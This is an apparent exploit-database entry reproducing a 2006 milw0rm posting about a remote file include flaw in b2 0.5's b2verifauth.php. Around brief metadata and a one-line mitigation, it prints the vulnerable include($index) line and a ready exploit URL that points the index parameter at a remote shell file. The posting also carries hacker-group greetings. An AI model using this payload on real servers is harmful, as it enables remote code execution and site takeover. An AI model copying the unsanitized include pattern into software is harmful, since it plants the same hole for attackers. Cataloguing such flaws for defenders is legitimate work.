b2 - 0.5 * [index] ******************* Remote File Ýnclude

vendor:

N/A

by:

mdx

7,5

CVSS

HIGH

Remote File Include Vulnerability

CWE

Product Name: N/A

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

b2 – 0.5 * [index] ******************* Remote File Ýnclude

A remote file include vulnerability exists in b2verifauth.php, which allows an attacker to include a remote file. The vulnerable code is include($index);, where the $index variable is not sanitized and can be manipulated to include a remote file.

Mitigation:

Input validation should be used to prevent the inclusion of remote files.

Source

Exploit-DB raw data:

******************************************************************************************************
*b2 - 0.5 * [index] ******************* Remote File Ýnclude*******************************************
******************************************************************************************************
******************************************* +class : Remote File Include Vulnerability*
+******************************************************************************************************************
+Author : mdx                                                               
*
*****************************************************************************
+Files :                                                                    *
+b2verifauth.php? 							    *
*                                                                           *
**********************************************************************************
+code  :								         *
+									         *
+         include($index);							 *
+									         *
*********************************************************************************************
+ Exploit  :										    *
+********************************************************************************************+
+ http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?  		     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=================================================================================================================
?		   Hi , The_bat_hacker , How are you ? ;=) 				     			*
?											     			*
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , Ozii ,padisah, sakkure ,zip,y.$il abbad, dreamlord  *
?											     			*
?////////////////////////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************									     *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..  		     *
*******************									     *
*******************                        Turkish Hacker by mdx  			     *
******************* 		   							     *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************              							     *
**********************************************************************************************

# milw0rm.com [2006-12-23]